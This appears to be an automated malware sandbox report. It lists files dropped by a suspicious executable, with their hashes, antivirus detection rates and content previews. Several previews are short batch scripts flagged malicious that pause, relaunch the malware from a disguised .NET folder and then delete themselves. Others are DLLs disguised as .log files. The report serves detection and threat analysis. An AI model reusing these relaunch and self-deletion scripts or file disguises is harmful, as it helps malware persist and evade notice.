C:\Users\user\AppData\Local\Temp\kbLEDWdIV6

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:IXhTUtD6:qWt+
MD5:	65482D64427ADF1F29E6BB8998A4D12A
SHA1:	348FEF305C7426A3690DD6514462059626AD1D0C
SHA-256:	E45FA82771FC701512C7AE6EB1F60C67FA4FB4F904EE1A2166AA90730E212EEA
SHA-512:	EE218531214304246D1228819465F388660E6B32A0E6016D6E384EF935D4D15E2267A569DDA991371856773646F24325C33E2441AD0D0E31D16392C8C5090B42
Malicious:	false
Preview:	kND2xxl6IfCK8rbjasPcYEEAV

C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	193
Entropy (8bit):	5.341820438800527
Encrypted:	false
SSDEEP:	6:hCRLuVFOOr+DER5I3u11fthnSSKOZG1CHhJ23f3:CuVEOCDEfTWRv
MD5:	550F9840CD0E8CF7A462472BFC0F017A
SHA1:	A1D3B685AA9D3830418BD962654E09328A755314
SHA-256:	547A9A69DBC9989756D50E5F214A74F1E9651A01A6EFC839EBC85FE2C6486F89
SHA-512:	381364825F1E1678CF6DCEA03681B9B5671E7C77F52F2C0E50C158560AEC8FDDA8AF48796B959B0C0EE42C95654E0138866085C928E712E9E0790F3EFB2E0D82
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\mpHYiEZ4vY.bat"

C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.221609494746644
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23fTZwn:HTg9uYDEfTWRu
MD5:	3665C1B3FB59F5499378790489A46094
SHA1:	403E868E9A29B166FC4CFE0ABFCDE81257FA0CCC
SHA-256:	F5E71593EB91487BA987CF3A42759ACF174EE9C3BD3F79C70DC95F20F9D1AA99
SHA-512:	3BFE53F5F2E43EEB11F8E52EFAE877384D18CD74E2CEF7B81C26AF71264176E3C177D13860F54A5FE62BBDF8B6B23834393835412A4D39C9904235ACFE0ADCF5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\mzBmoeLRKc.bat"

C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.178870947730656
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23ft4:HTg9uYDEfTWRS
MD5:	FAABCDDC12DEB036EFB4340E544020A0
SHA1:	54407C3934F501E799A3DFF384B3E8892114D584
SHA-256:	32A4A40DDAC0EAC41348DFB13979FFDAC62751AD5BA6E1F6997FE782CF1AD0F1
SHA-512:	126BBB9A25321911A74B4315D2DA4E19EB9EA6178375DB5EAF75E3C56BF6C455DE4602B3487A4825A6E394B391F7D72120982E8EEFD4E6F8D464E07D3F3A3FD5
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\riciCmDgnt.bat"

C:\Users\user\AppData\Local\Temp\sF1f8KSh6h

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.643856189774723
Encrypted:	false
SSDEEP:	3:K2vqWJzQ3:K8LzQ3
MD5:	83C11EDBA74C91643BA63E6BA348F150
SHA1:	998C7A382975EC27C1A0C0715C26D77E6E0110B1
SHA-256:	3131F3F6F91A4E569BA353941AB460EADFD634CC40CD7EF73A46878C2B816CFD
SHA-512:	C42FA7152EA90BFEF7F723B3430BB10A75FBB66E5E8117DA442D7B33BE71036D25F5A7069D276A388FFB42AF4CC81C40643E6AA98C9382DD68F1DE334D01C727
Malicious:	false
Preview:	1vohTlNP8iUV9B3mX0qkAjnuR

C:\Users\user\AppData\Local\Temp\tAlK2upyiu

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:6kdM32n:6km32
MD5:	233F71DF1CC26E98EFF30BD3C9A27A31
SHA1:	3C0E847730DC84AC96D988276CBAF5871AC8F1F8
SHA-256:	DA9112E0D38F3C9861D8B5B1D4050B2982A2E7E4CC6D2D6CF82D042BCB7D1B1E
SHA-512:	7C43CF2D4556F5A10F8E24E2F8A26EBD3CA528DEA5C3A22EF8CBE06659542694829CA291F6117F442E532479C40A2F76C5FA751EC1C421DC73C330866928E3E6
Malicious:	false
Preview:	RafAxpoVNR7P3ZkTiNAwvtfib

C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.256781509415275
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23fBDkRH:HTg9uYDEfTWRdq
MD5:	0DB8BF246DAD9AA71546CCD48821F2B7
SHA1:	843D95C252B3AE4E9CC28701E1F36720645AAD34
SHA-256:	F669A072E3A08959F4CCD1928257681A6307F02E876E7C485223B66F72D8239E
SHA-512:	D260D3990CA1F835F91659B3F684890BF646CF7BFB6E818349132D5315DE2814A22212E4327EFAC37D380D585488C198268742F8F508CC45DF0927631BD69645
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\tOMWzubzd4.bat"

C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.246552165955192
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DER5I3u11fthnSSKOZG1CHhJ23fbK:HTg9uYDEfTWR+
MD5:	46D2CF0AF0147A6D185C41B3C00F0E31
SHA1:	8E7BC9F468CFD575B03822761CB67061F8B5A36D
SHA-256:	C1C4763BDD8AD8118823EF68D0FF66009AB9CEC585756B430EADA4740D4249AE
SHA-512:	54B984F104E9998594531F2B57A1C1D9CB64A2A5CAFB5E168BB662D5F6652FE55317F5874A93CEA4606F22047B8CBDDB3608D49882077B2E8B743FD58617D6B4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\uw07fWAZe6.bat"

C:\Users\user\Desktop\38d863ed75bbb0

Download File

Process:	C:\Users\user\Desktop\yQrCGtNgsf.exe
File Type:	ASCII text, with very long lines (753), with no line terminators
Category:	dropped
Size (bytes):	753
Entropy (8bit):	5.908960829223101
Encrypted:	false
SSDEEP:	12:L5ETfeYv3awB0N7WAGVn6du1c66x3tfxjOfCS90E47TG0HBiPMhcaodw:L5EhjB0N7DG8duH6dJEYS0HBkMqtw
MD5:	573BEEE069FBB9380479E4E27E7E760A
SHA1:	6E5007DF69EA90ECC65E87420808447E60EC75F2
SHA-256:	D244ECA6F987B6E70A4822E162AA900EB716A9B86B096C0BDABF4F68BB3F2D83
SHA-512:	0BC8E1B5DA62D2C4C62CCE07CE3CAC64F5BFC53E7ADEA75068A52353444CE6805D89C8F9AA0D97B34D81E21C9A919596898F34FD6CDB9FA7BE247F645A53507C
Malicious:	false
Preview:	ZFjrEGj1U3hNC7cfYyt0NNFWc8zlph6swkxB9FX11cFJzR7lwPqh9VgL9MPFR7Mx7zbbKagTa28vI6hKBNza0YtbEmBw0Sk3QSL90fbVtXHGWvDDoEEDHv7jFAXhZtdISFf0uhUgweqdQnESj8HvNgveVl40H35938xRPNTHuiQnFdTc5E8alr4vTBeIndY3iqjRzwCWpABpPIY1Sb4C4eYMEC7OsKdQJXEY4BnICmvlpPfKmnzLjV9DSXNwzynegvf2EA7RyvARtwgygwmEVSqxYAFhx0TN8QF4tnGlqhXxVrUg0ZQCLjJOEreD4Ze7cwScrmF2qBYx43cqqjqYjRCZH1zBIDqQDZViY2yOUXVKLWTLPxXVtGYKu3V0wDunUHufh3SyubDM52OvinwVpVg6BKyfg8bQnszDmxnVfjkRCMO1okRIRY79kxeWFwRv9xiMCKJuAazGuP4z6606qS9Ov0dyTQQtSzRPnBzeahI0j1OV3oaI5UErxTbMrUbtJGx57oL4HWfJKIp3lH5o0Hx8ukbUkmwGGZrcDSYOdgBiy5honikjZw3BTzLWN1UejZDubN0TtqLTGOJyDwqBCNrTgpJNHBBlLg9Y1wNarR0skj5EpWSaLSbWstOwDmLrpkIkPv6RjPUvW8s6uFhutlZ3EmqIhbXFFICAbUy4ZB068q9tBRC8Ea8EKOfnEytH1OqO5rfZQnUrud4Ym6GQZZAoK80MzLzlSsEtAvxTwmrbFQUqT

C:\Users\user\Desktop\BDesMBdT.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 11%, Browse
Joe Sandbox View:	Filename: qDlkXj5kcZ.exe, Detection: malicious, Browse Filename: C0laqZmkEf.exe, Detection: malicious, Browse Filename: VL1xZpPp1I.exe, Detection: malicious, Browse Filename: qM9xet97tX.exe, Detection: malicious, Browse Filename: F0F0LjrOzL.exe, Detection: malicious, Browse Filename: 4NE6yDivAo.exe, Detection: malicious, Browse Filename: OR4zbcEK70.exe, Detection: malicious, Browse Filename: BootstrapperV1.19.exe, Detection: malicious, Browse Filename: 4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe, Detection: malicious, Browse Filename: eRZQCpMb4y.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\FTTrxXjd.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\GJcAmyRG.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71% Antivirus: Virustotal, Detection: 69%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\HPxsKDSZ.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\IjLZavdG.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\KRjbfmWU.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 41%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\KZthgyKJ.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 11%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\LCrhcYww.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8% Antivirus: Virustotal, Detection: 11%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\MAAYLQkP.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\NkPigQpK.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17% Antivirus: Virustotal, Detection: 41%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\OzAXPueG.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\RdNoqiHi.log

Download File

Process:	C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 29%, Browse
